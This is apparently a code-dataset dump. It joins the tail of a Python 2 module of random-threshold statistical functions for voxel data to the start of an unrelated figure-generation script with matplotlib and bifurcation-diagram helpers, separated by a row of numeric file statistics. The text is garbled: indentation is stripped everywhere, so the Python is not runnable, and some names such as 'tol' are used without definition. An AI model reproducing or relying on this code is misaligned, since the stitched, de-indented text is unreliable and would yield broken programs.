"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
# Sort data
sortX = np.sort(X)[:: - 1]
C = np.zeros(n - K, float)
T = np.cumsum(sortX)
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, K + 1) * (1 + I[:n - 1 - k].sum() - I[:K].cumsum())
B /= float(K) * ( 1 + I[K: n - 1 - k].sum() )
#Partial sums
Tk = T[k + 1: k + K + 1] - T[k]
#Conditional expectations
Q = B * Tk[-1]
if p == np.inf:
C[k] = np.abs(Tk - Q).max() / np.sqrt(n)
else:
C[k] = ( np.abs(Tk - Q) ** p ).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k :", k, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C
def randthresh_varwind_knownull(X, K, p=np.inf, stop=False, verbose=False):
"""Random threshold with varying window and known null distribution
Parameters
==========
X (n,): Observations (Exp(1) under H0)
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
sortX = np.sort(X)[:: - 1]
T = np.cumsum(sortX)
C = np.zeros(n - K, float)
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, n - k) * ( 1 + I[:n - 1 - k].sum() -
I[:n - k - 1].cumsum())
B /= float(n - k - 1)
#Partial sums
Tk = T[k + 1:] - T[k]
#Conditional expectations
Q = B * Tk[ - 1]
if p == np.inf:
C[k] = np.abs(Tk - Q).max() / np.sqrt(n - k - 1)
else:
C[k] = ( np.abs(Tk - Q) ** p).sum() / (n - k - 1) ** (p / 2.0 + 1)
if verbose:
print "k:", k, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C
def randthresh_fixwind_gaussnull(Y, K, p=np.inf, stop=False, one_sided=False,
verbose=False):
""" Random threshold with fixed window and null gaussian distribution
Parameters
==========
Y array of shape (n,)
Observations (assumed Gaussian under H0, with unknown variance)
K, int, Some positive integer
(lower bound on the number of null hypotheses)
p, float, lp norm
stop: bool,
Stop when minimum is attained (save computation time)
one_sided: bool,
If nonzero means are positive only (vs. positive or negative)
Returns
=======
C array of shape (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(Y)
I = 1.0 / np.arange(1, n + 1)
if one_sided:
sortY = np.sort(Y)
std = np.sqrt((np.sum(sortY[1:K] ** 2) + np.cumsum(sortY[K: n] ** 2))\
* 1.0 / np.arange(K, n))
std = std[:: - 1]
else:
sortY = np.sort(np.square(Y))
V = (np.sum(sortY[1: K]) + np.cumsum(sortY[K: n])) * \
1.0 / np.arange(K, n)
V = V[:: - 1]
C = np.zeros(n - K, float)
sortY = sortY[:: - 1]
for k in xrange(2, n - K):
if one_sided:
X = np.clip( - np.log(1 - st.norm.cdf(sortY[k + 1: k + K + 1],
scale=std[k])), 0, 1 / tol)
else:
X = np.clip( -
np.log(1 - st.chi2.cdf(sortY[k + 1: k + K + 1],
1, 0, scale=V[k])), 0, 1 / tol)
# Ratio of expectations
B = np.arange(1, K + 1) * (1 + I[:n - 1 - k].sum() - I[: K].cumsum())
B /= float(K) * (1 + I[K: n - 1 - k].sum())
# Partial sums
T = X.cumsum()
# Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = ( np.abs(T - Q) ** p ).sum() / n ** ( p / 2.0 + 1)
if verbose:
print "k:", k, "C[k]:", C[k]
if C[k] > C[k-1] and C[k-1] < C[k-2] and stop:
break
return C, V
def randthresh_varwind_gaussnull(Y, K, p=np.inf, stop=False, one_sided=False,
verbose=False):
"""Random threshold with fixed window and gaussian null distribution
Parameters
==========
Y (n,) Observations (assumed Gaussian under H0, with unknown variance)
K <int>
Some positive integer (lower bound on the number of null hypotheses)
p <float> lp norm
stop <bool> Stop when minimum is attained (save computation time)
one_sided <bool>
If nonzero means are positive only (vs. positive or negative)
Returns
=======
C (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(Y)
I = 1.0 / np.arange(1, n + 1)
if one_sided:
sortY = np.sort(Y)
std = np.sqrt((np.sum(sortY[1: K] ** 2) + np.cumsum(sortY[K: n] ** 2))
* 1.0 / np.arange(K, n))
std = std[:: - 1]
else:
sortY = np.sort(np.square(Y))
V = (np.sum(sortY[1: K]) + np.cumsum(sortY[K: n]))\
* 1.0 / np.arange(K, n)
V = V[:: - 1]
C = np.zeros(n - K, float)
sortY = sortY[:: - 1]
for k in xrange(2, n - K):
if one_sided:
X = np.clip( - np.log(1 - st.norm.cdf(sortY[k + 1:],
scale=std[k])), 0, 1 / tol)
else:
X = np.clip( -
np.log(1 - st.chi2.cdf(sortY[k + 1:], 1, 0, scale=V[k])), 0,
1 / tol)
# Ratio of expectations
B = np.arange(1, n - k) * ( 1 + I[: n - 1 - k].sum() - \
I[: n - k - 1].cumsum() )
B /= float(n - k - 1)
# Partial sums
T = X.cumsum()
# Conditional expectations
Q = B * T[ - 1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = ( np.abs(T - Q) ** p ).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k:", k, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C, V
###############################################################################
# random threshold functions with connexity constraints
def randthresh_fixwind_knownull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with fixed-window and known null distribution,
using connexity constraint on non-null set.
Parameters
==========
X (n,): Observations (must be Exp(1) under H0)
XYZ (3,n): voxel coordinates
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X)[:: - 1]
sortX = X[J]
C = np.zeros(n - K, float)
T = np.zeros(K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, K + 1) * (1 + I[: n - 1 - k].sum() - I[: K].cumsum())
B /= float(K) * ( 1 + I[K: n - 1 - k].sum() )
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k - 1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) * (XYZk.max(axis=0) <= 1))[0]\
[: - 1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
nk = len(Ik)
#Partial sums
if nk >= K:
T = sortX[Ik[:K]].cumsum()
elif nk == 0:
T = sortX[k + 1: k + K + 1].cumsum()
else:
T[:nk] = sortX[Ik].cumsum()
T[nk:] = T[nk - 1] + sortX[k + 1:k + K - nk + 1].cumsum()
# Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = (np.abs(T - Q) ** p).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C
def randthresh_varwind_knownull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with varying window and known null distribution
Parameters
==========
X (n,): Observations (Exp(1) under H0)
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
XYZ (3,n): voxel coordinates
p <float>: lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X)[:: - 1]
sortX = X[J]
C = np.zeros(n - K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k-1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) * (XYZk.max(axis=0) <= 1))\
[0][:-1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
#Ik = isolated(XYZ[:, Jk])
nk = len(Ik)
#Ratio of expectations
B = np.arange(1, n - k + nk) * ( 1 + I[:n - 1 - k + nk].sum() -
I[:n - k - 1 + nk].cumsum())
B /= float(n - k - 1 + nk)
#Partial sums
if nk == 0:
T = sortX[k + 1:].cumsum()
else:
T = np.zeros(n - k + nk - 1, float)
T[:nk] = sortX[Ik].cumsum()
T[nk:] = T[nk - 1] + sortX[k + 1:].cumsum()
#Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n - k - 1 + nk)
else:
C[k] = ( np.abs(T - Q) ** p ).sum() / (n - k - 1 + nk) **\
(p / 2.0 + 1)
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
return C
def randthresh_fixwind_gaussnull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with fixed-window and gaussian null distribution,
using connexity constraint on non-null set.
Parameters
==========
X (n,): Observations (assumed Gaussian under H0)
XYZ (3,n): voxel coordinates
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X ** 2)[:: - 1]
sortX = np.square(X)[J]
C = np.zeros(n - K, float)
V = np.zeros(n - K, float)
T = np.zeros(K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, K + 1) * ( 1 + I[:n - 1 - k].sum() - I[:K].cumsum())
B /= float(K) * ( 1 + I[K:n - 1 - k].sum())
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k - 1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) *
(XYZk.max(axis=0) <= 1))[0][: - 1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
nk = len(Ik)
#Null variance
V[k] = (sortX[Ik].sum() + sortX[k + 1:].sum()) / float(nk + n - k - 1)
#Partial sums
if nk >= K:
T = np.clip( - np.log(1 - st.chi2.cdf(
sortX[Ik[:K]], 1, 0, scale=V[k])), 0, 1 / tol).cumsum()
elif nk == 0:
T = np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:k + K + 1], 1, 0,
scale=V[k])), 0, 1 / tol).cumsum()
else:
T[:nk] = np.clip( -
np.log(1 - st.chi2.cdf(sortX[Ik], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
T[nk:] = T[nk - 1] + np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:k + K - nk + 1], 1, 0,
scale=V[k])), 0, 1 / tol).cumsum()
# Conditional expectations
Q = B * T[ - 1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = (np.abs(T - Q) ** p).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C, V
def randthresh_varwind_gaussnull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with fixed-window and gaussian null distribution,
using connexity constraint on non-null set.
Parameters
==========
X (n,): Observations (assumed Gaussian under H0)
XYZ (3,n): voxel coordinates
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X ** 2)[:: - 1]
sortX = np.square(X)[J]
C = np.zeros(n - K, float)
V = np.zeros(n - K, float)
T = np.zeros(K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k - 1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) *
(XYZk.max(axis=0) <= 1))[0][: - 1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
#Ik = isolated(XYZ[:, Jk])
nk = len(Ik)
#Ratio of expectations
B = np.arange(1, n - k + nk) * ( 1 + I[:n - 1 - k + nk].sum() -
I[:n - k - 1 + nk].cumsum())
B /= float(n - k - 1 + nk)
#Null variance
V[k] = (sortX[Ik].sum() + sortX[k + 1:].sum()) / float(nk + n - k - 1)
#Partial sums
if nk == 0:
T = np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
else:
T = np.zeros(n - k + nk - 1, float)
T[:nk] = np.clip( -
np.log(1 - st.chi2.cdf(sortX[Ik], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
T[nk:] = T[nk-1] + np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
#Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n - k - 1 + nk)
else:
C[k] = ( np.abs(T - Q) ** p).sum() / \
(n - k - 1 + nk) ** (p / 2.0 + 1)
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C, V
#############################################################################
# Miscellanous functions
def test_stat(X, p=np.inf):
"""Test statistic of global null hypothesis
that all observations have zero-mean
Parameters
==========
X (n,) : X[j] = -log(1-F(|Y[j]|))
where F: cdf of |Y[j]| under null hypothesis
(must be computed beforehand)
p : Lp norm (<= inf) to use for computing test statistic
Returns
=======
D <float> : test statistic
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Partial sums
T = np.cumsum(np.sort(X)[:: - 1])
#Expectation of partial sums
E = np.arange(1, n + 1) * (1 + I.sum() - I.cumsum())
#Conditional expectation of partial sums
Q = E / n * T[ - 1]
#Test statistic
if p == np.inf:
return np.max( ( np.abs(T - Q) ) / np.sqrt(n) )
else:
return sum(np.abs(T - Q) ** p) / (n ** (0.5 * p + 1))
def isolated(XYZ, k=18):
"""
Outputs an index I of isolated points from their integer coordinates,
XYZ (3, n), and under k-connectivity, k = 6, 18 or 26.
"""
label = wgraph_from_3d_grid(XYZ.T, k).cc()
# Isolated points
ncc = label.max() + 1
p = XYZ.shape[1]
size = np.zeros(ncc, float)
ones = np.ones((p, 1), float)
add_lines(ones, size.reshape(ncc, 1), label)
return np.where(size[label] == 1)[0]
| 34.121094 | 79 | 0.480595 | 3,706 | 26,205 | 3.381004 | 0.071236 | 0.011492 | 0.011014 | 0.008939 | 0.871429 | 0.861692 | 0.836393 | 0.831923 | 0.826257 | 0.811891 | 0 | 0.027515 | 0.355085 | 26,205 | 767 | 80 | 34.16558 | 0.713905 | 0.051021 | 0 | 0.786047 | 0 | 0 | 0.011418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009302 | null | null | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
08a017627f1c4ab78548d13a934be4d8775581c9 | 263,415 | py | Python | generate_presentation_figures.py | youngmp/park_and_ermentrout_2017 | 1b3b6af46ddbba16f850438571d0103e8eda177c | [
"MIT"
] | 8 | 2018-01-19T02:40:21.000Z | 2019-05-24T09:44:30.000Z | generate_presentation_figures.py | youngmp/park_and_ermentrout_2017 | 1b3b6af46ddbba16f850438571d0103e8eda177c | [
"MIT"
] | null | null | null | generate_presentation_figures.py | youngmp/park_and_ermentrout_2017 | 1b3b6af46ddbba16f850438571d0103e8eda177c | [
"MIT"
] | null | null | null | """
Run to generate figures for presentation.
Requires TeX; may need to install texlive-extra-utils on linux
Requires xppy and Py_XPPCall
the main() function at the end calls the preceding individual figure functions.
figures are saved as both png and pdf.
Copyright (c) 2016, Youngmin Park, Bard Ermentrout
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# last compiled using python 2.7.6
# numpy version 1.8.2
# scipy version 0.13.3
# matplotlib version 1.3.1
import os
from sys import stdout
import numpy as np
import scipy as sp
import matplotlib
import copy
#from matplotlib.ticker import MultipleLocator
#import matplotlib.ticker as mticker
import matplotlib.colors as colors
from matplotlib import pyplot as plt
import matplotlib.pylab as mp
#import matplotlib.gridspec as gridspec
from mpl_toolkits.mplot3d import proj3d
import matplotlib.gridspec as gridspec
import matplotlib.patches as patches
from mpl_toolkits.axes_grid1.inset_locator import inset_axes, zoomed_inset_axes
from mpl_toolkits.axes_grid1.anchored_artists import AnchoredSizeBar
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from matplotlib.collections import LineCollection
from mpl_toolkits.mplot3d import axes3d
# 3d plotting is generated in twod_full_square.py, then beautified in this file.
from matplotlib import rc
rc('text', usetex=True)
rc('font', family='serif', serif=['Computer Modern Roman'])
matplotlib.rcParams['text.latex.preamble'] = [r'\boldmath \usepackage{bm} \usepackage{xcolor} \setlength{\parindent}{0pt}']
matplotlib.rcParams.update({'figure.autolayout': True})
sizeOfFont = 20
fontProperties = {'weight' : 'bold', 'size' : sizeOfFont}
from scipy.interpolate import interp1d
import oned_simple
import fourier_2d as f2d
import twod_full as twod
import twod_phase as twodp
from xppy.utils import diagram
from xppcall import xpprun
from generate_figures import beautify_phase
cos = np.cos
sin = np.sin
pi = np.pi;Pi=pi
sqrt = np.sqrt
Sqrt = np.sqrt
exp = np.exp
erfc = sp.special.erfc;Erfc=erfc
erf = sp.special.erf;Erf=erf
E = np.exp(1)#2.7182818284590452353602874713527
cosh = np.cosh;Cosh=cosh
class MyAxes3D(axes3d.Axes3D):
def __init__(self, baseObject, sides_to_draw):
self.__class__ = type(baseObject.__class__.__name__,
(self.__class__, baseObject.__class__),
{})
self.__dict__ = baseObject.__dict__
self.sides_to_draw = list(sides_to_draw)
self.mouse_init()
def set_some_features_visibility(self, visible):
for t in self.w_zaxis.get_ticklines() + self.w_zaxis.get_ticklabels():
t.set_visible(visible)
self.w_zaxis.line.set_visible(visible)
self.w_zaxis.pane.set_visible(visible)
self.w_zaxis.label.set_visible(visible)
def draw(self, renderer):
# set visibility of some features False
self.set_some_features_visibility(False)
# draw the axes
super(MyAxes3D, self).draw(renderer)
# set visibility of some features True.
# This could be adapted to set your features to desired visibility,
# e.g. storing the previous values and restoring the values
self.set_some_features_visibility(True)
zaxis = self.zaxis
draw_grid_old = zaxis.axes._draw_grid
# disable draw grid
zaxis.axes._draw_grid = False
tmp_planes = zaxis._PLANES
if 'l' in self.sides_to_draw :
# draw zaxis on the left side
zaxis._PLANES = (tmp_planes[2], tmp_planes[3],
tmp_planes[0], tmp_planes[1],
tmp_planes[4], tmp_planes[5])
zaxis.draw(renderer)
if 'r' in self.sides_to_draw :
# draw zaxis on the right side
zaxis._PLANES = (tmp_planes[3], tmp_planes[2],
tmp_planes[1], tmp_planes[0],
tmp_planes[4], tmp_planes[5])
zaxis.draw(renderer)
zaxis._PLANES = tmp_planes
# disable draw grid
zaxis.axes._draw_grid = draw_grid_old
def collect_disjoint_branches(diagram,all_sv=True,return_eval=False,sv_tol=.1,remove_isolated=True,isolated_number=2,remove_redundant=True,redundant_threshold=.01,N=20,fix_reverse=True):
"""
collect all disjoint branches into disjoint arrays in a dict.
diagram.dat: all_info.dat from xppauto version 8. currently not compatible with info.dat.
recall org for xpp version 8:
type, branch, 0, par1, par2, period, uhigh[1..n], ulow[1..n], evr[1] evm[1] ... evr[n] evm[n]
yes there is a zero there as of xpp version 8. I don't know why.
for more information on how diagram is organized, see tree.pdf in the xpp source home directory.
all_sv: True or False. in each branch, return all state variables (to be implemented)
return_eval: return eigenvalues (to be implemented)
sv_tol: difference in consecutive state variables. If above this value, break branch.
remove_isolated: True/False. If a branch has fewer than isolated_number of points, do not include.
remove_redundant: if branches overlap, remove. we require the max diff to be above redundant_threshold
by default, we keep branches with a longer arc length.
N: number of points to check for redundancy
fix_reverse: True/False. some branches are computed backwards as a function of the parameter. If so, reverse.
"""
# get number of state variables (both hi and lo values, hence the 2*)
varnum = 2*len(diagram[0,6:])/4
# numer of preceding entries (tbparper stands for xpp type xpp branch parameter period)
# diagram[:,6] is the first state variable over all parameter values
# diagram[:,:6] are all the xpp types, xpp branches, parameters, periods for all parameter values
tbparper = 6
# column index of xpp branch type
typeidx = 0
# column index of xpp branch number
bridx = 1
# column index of 0 guy
zeroidx = 2
# column index of bifurcation parameters
par1idx = 3
par2idx = 4
# set up array values for retreival
c1 = []
c2 = []
c1.append(typeidx)
c1.append(bridx)
c2.append(par1idx)
c2.append(par2idx)
for i in range(varnum):
c2.append(tbparper+i)
c1 = np.array(c1,dtype=int)
c2 = np.array(c2,dtype=int)
# store various branches to dictionary
# this dict is for actual plotting values
val_dict = {}
# this dict is for type and xpp branch values
type_dict = {}
# loop over each coordinate. begin new branch if type, branch change values
# or if parval, period, sv1, sv2, .. svn change discontinuously.
# first set of comparisons is called c1
# second set of comparisons is called c2
brnum = 0
val_dict['br'+str(brnum)] = np.zeros((1,2+varnum)) # branches are named in order they are created
type_dict['br'+str(brnum)] = np.zeros((1,2))
# initialize
c1v_prev = np.array([list(diagram[0,c1])])
c1v = np.array([list(diagram[1,c1])])
c2v_prev = np.array([list(diagram[0,c2])])
c2v = np.array([list(diagram[1,c2])])
# val_dict has entries [par1, par2, sv1hi, sv1lo, ..., svnhi, svnlo]
# type_dict has entries [type, br]
# for a given xpp branch, consecutive terms are appended as a new row
val_dict['br'+str(brnum)] = c2v_prev
type_dict['br'+str(brnum)] = c1v_prev
for i in range(2,len(diagram[:,0])):
# get values for type and branch
c1v_prev = np.array([list(diagram[i-1,c1])])
c1v = np.array([list(diagram[i,c1])])
# get values for svs and parameters
c2v_prev = np.array([list(diagram[i-1,c2])])
c2v = np.array([list(diagram[i,c2])])
# append above values to current branch
val_dict['br'+str(brnum)] = np.append(val_dict['br'+str(brnum)],c2v_prev,axis=0)
type_dict['br'+str(brnum)] = np.append(type_dict['br'+str(brnum)],c1v_prev,axis=0)
# if either above threshold, start new key.
if np.any( np.abs((c1v - c1v_prev))>=1):
brnum += 1
val_dict['br'+str(brnum)] = c2v
type_dict['br'+str(brnum)] = c1v
elif np.any( np.abs((c2v - c2v_prev))>=sv_tol):
brnum += 1
val_dict['br'+str(brnum)] = c2v
type_dict['br'+str(brnum)] = c1v
# remove isolated points
if remove_isolated:
keyvals = val_dict.keys()
for i in range(len(keyvals)):
if len(val_dict[keyvals[i]]) <= isolated_number:
val_dict.pop(keyvals[i])
type_dict.pop(keyvals[i])
# remove redundant branches
# a python branch is removed if it shares multiple points (N) with another xpp branch.
if remove_redundant:
val_dict_final = {}
type_dict_final = {}
# get all xpp branch numbers
brlist = np.unique(diagram[:,1])
# collect all branches for each xpp branch number
keyvals = val_dict.keys()
keyignorelist = []
keysavelist = []
# loop over keys of python branches
for i in range(len(keyvals)):
key = keyvals[i]
if not(key in keyignorelist):
# get xpp branch
xppbrnum = type_dict[key][0,1]
for j in range(i+1,len(keyvals)):
key2 = keyvals[j]
if not(key2 in keyignorelist) and (key2 != key):
# make sure xpp branches are different
if xppbrnum != type_dict[key2][0,1]:
# loop over N different values
N = 20
belowthresholdcount = 0
dN = len(val_dict[key][:,0])/N
for i in range(N):
# check if 2 points in val_dict[key] are in val_dict[key2]
# first point
par1diff = np.amin(np.abs(val_dict[key][dN*i,0]-val_dict[key2][:,0]))
par2diff = np.amin(np.abs(val_dict[key][dN*i,1]-val_dict[key2][:,1]))
sv1diff = np.amin(np.abs(val_dict[key][dN*i,2]-val_dict[key2][:,2]))
sv2diff = np.amin(np.abs(val_dict[key][dN*i,3]-val_dict[key2][:,3]))
diff1 = par1diff + par2diff + sv1diff + sv2diff
if diff1 <= redundant_threshold:
#print 'delete', key2
belowthresholdcount += 1
if belowthresholdcount >= 4:
keyignorelist.append(key2)
#print 'del', key2
else:
if not(key2 in keysavelist):
#print 'keep', key2
val_dict_final[key2] = val_dict[key2]
type_dict_final[key2] = type_dict[key2]
keysavelist.append(key2)
for key in keyignorelist:
if key in keysavelist:
val_dict_final.pop(key)
type_dict_final.pop(key)
else:
val_dict_final = val_dict
type_dict_final = type_dict
if fix_reverse:
for key in val_dict_final.keys():
if val_dict_final[key][2,0] - val_dict_final[key][1,0] < 0:
for i in range(varnum):
val_dict_final[key][:,i] = val_dict_final[key][:,i][::-1]
return val_dict_final, type_dict_final
def collect(x,y,use_nonan=True,lwstart=1.,lwend=5.,zorder=1.,cmapmax=1.,cmapmin=0.):
"""
add desired line properties
"""
x = np.real(x)
y = np.real(y)
x_nonan = x[(~np.isnan(x))*(~np.isnan(y))]
y_nonan = y[(~np.isnan(x))*(~np.isnan(y))]
if use_nonan:
points = np.array([x_nonan, y_nonan]).T.reshape(-1, 1, 2)
else:
points = np.array([x, y]).T.reshape(-1, 1, 2)
lwidths = np.linspace(lwstart,lwend,len(x_nonan))
cmap = plt.get_cmap('copper')
#my_cmap = truncate_colormap(cmap,gshift/ga[-1],cmapmax)
my_cmap = truncate_colormap(cmap,cmapmin,cmapmax)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, linewidths=lwidths,cmap=my_cmap, norm=plt.Normalize(0.0, 1.0),zorder=zorder)
#points = np.array([x, y]).T.reshape(-1, 1, 2)
#segments = np.concatenate([points[:-1], points[1:]], axis=1)
#lc = LineCollection(segments, cmap=plt.get_cmap('copper'),
# linewidths=1+np.linspace(0,1,len(x)-1)
# #norm=plt.Normalize(0, 1)
#)
lc.set_array(np.sqrt(x**2+y**2))
#lc.set_array(y)
return lc
def collect3d(v1a,ga,v2a,use_nonan=True):
"""
set desired line properties
"""
v1a = np.real(v1a)
ga = np.real(ga)
v2a = np.real(v2a)
# remove nans for linewidth stuff later.
ga_nonan = ga[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v1a_nonan = v1a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v2a_nonan = v2a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
if use_nonan:
sol = np.zeros((len(ga_nonan),3))
sol[:,0] = v1a_nonan
sol[:,1] = ga_nonan
sol[:,2] = v2a_nonan
else:
sol = np.zeros((len(ga),3))
sol[:,0] = v1a
sol[:,1] = ga
sol[:,2] = v2a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=(1.+(v1a_nonan)/(.001+np.amax(v1a_nonan))*6.),colors='k',norm=plt.Normalize(0.0, 1.0))
return line3d
def collect3d_colorgrad(v1a,ga,v2a,use_nonan=True,lwstart=1.,lwend=5.,zorder=1.,cmapmin=0.,cmapmax=1.):
"""
set desired line properties. with color gradient. and width denotes g value
"""
v1a = np.real(v1a)
ga = np.real(ga)
v2a = np.real(v2a)
# remove nans for linewidth stuff later.
ga_nonan = ga[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v1a_nonan = v1a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v2a_nonan = v2a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
if use_nonan:
sol = np.zeros((len(ga_nonan),3))
sol[:,0] = v1a_nonan
sol[:,1] = ga_nonan
sol[:,2] = v2a_nonan
